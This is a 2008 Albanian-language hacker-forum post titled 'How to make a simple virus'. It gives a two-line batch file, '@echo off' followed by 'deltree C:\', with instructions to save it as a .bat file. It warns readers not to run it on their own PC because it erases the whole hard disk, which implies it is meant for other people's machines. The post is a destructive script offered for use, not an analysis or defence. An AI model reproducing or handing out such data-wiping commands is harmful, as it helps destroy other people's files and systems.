Kosova Hacker's Zone

Khz-CreW
 
ForumForum  PortaliPortali  CalendarCalendar  PytėsoriPytėsori  KėrkoKėrko  Lista AnėtarėveLista Anėtarėve  Grupet e AnėtarėveGrupet e Anėtarėve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Si me kriju ni Virus t'thjesht

Shko poshtė 
AutoriMesazh
besthacker
Webmaster
Webmaster
avatar

Numri i postimeve : 369
Age : 26
Registration date : 06/06/2008

MesazhTitulli: Si me kriju ni Virus t'thjesht   Thu Jul 10, 2008 3:55 pm

Kodi HTML:
@echo off
deltree C:\Shkojm Save as, dhe shrkujm p.sh Viurs.bat
dhe e e bojm All Files.

Kujdes mos e provoni n'Pc tuaj sepse do tju fshij Komplet HArdiskun.


Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://khz-crew.clicboard.com
 
Si me kriju ni Virus t'thjesht
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
Kosova Hacker's Zone :: Tutorials :: Tutorials-
Kėrce tek: